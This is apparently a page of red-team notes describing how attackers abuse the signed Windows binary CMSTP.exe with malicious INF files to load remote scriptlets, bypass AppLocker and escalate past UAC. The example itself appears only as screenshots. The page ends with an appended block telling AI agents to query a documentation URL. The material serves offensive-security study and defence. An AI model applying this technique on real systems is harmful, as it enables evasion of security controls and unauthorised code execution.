# CMSTP

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMTSP.exe) is command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote  access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / "Squiblydoo", CMSTP.exe may abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.

**Example**

This one was a little tricky as we needed to create an inf file but also have an sct file waiting for us remotely to execute code, as this will use the scrobj.dll to execute our code as well.

![](/files/-MRkXmlkFXW2YGvgRlHW)

Then execution should be simple

![](/files/-MRkXn_YqKV5JozbzlFg)

Careful as this will create a VPN Connection and leave a shortcut on the Desktop as well, a way to avoid this is to actually gain a shell (PowerShell, CMD) in this demo the reason (I think?) it is being left behind is because execution finalizes and doesn't stay in a continuous running state such as when receiving a shell

References:

<https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf>

<https://www.contextis.com/en/blog/applocker-bypass-via-registry-key-manipulation>

<https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/>

<https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80>

<https://twitter.com/NickTyrer/status/958450014111633408>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1218-signed-binary-proxy-execution/untitled-8.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.